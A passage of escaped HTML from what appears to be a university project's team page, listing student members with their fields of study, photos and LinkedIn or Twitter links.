href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c171-outer\">\n            <div data-colibri-id=\"182-c171\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c171 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c172\" class=\"d-block style-920 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c172-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c172-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-global-transition-all h-heading style-914 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c173\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"h-text h-text-component style-915 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"style-921 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"d-block style-922 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c177-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c177-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c178\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"style-923 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n            <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c182\" class=\"d-block style-913 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c182-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c182-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c183\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"style-917 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c186-outer\">\n            <div data-colibri-id=\"182-c186\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c186 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c187\" class=\"d-block style-913 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c187-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c187-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-914 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c188\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-text h-text-component style-915 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"style-917 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c191-outer\">\n            <div data-colibri-id=\"182-c191\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c191 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c192\" class=\"d-block style-913 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c192-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c192-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-global-transition-all h-heading style-914 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c193\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"h-text h-text-component style-915 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c195\" class=\"style-917 style-local-182-c195 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c196-outer\">\n            <div data-colibri-id=\"182-c196\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c196 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c197\" class=\"d-block style-913 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c197-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c197-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-global-transition-all h-heading style-914 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c198\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-915 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c200-outer\">\n            <div data-colibri-id=\"182-c200\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c200 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c201\" class=\"d-block style-913 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c201-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c201-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-global-transition-all h-heading style-914 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c202\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-text h-text-component style-915 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"style-917 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c205-outer\">\n            <div data-colibri-id=\"182-c205\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c205 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c206\" class=\"d-block style-913 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img 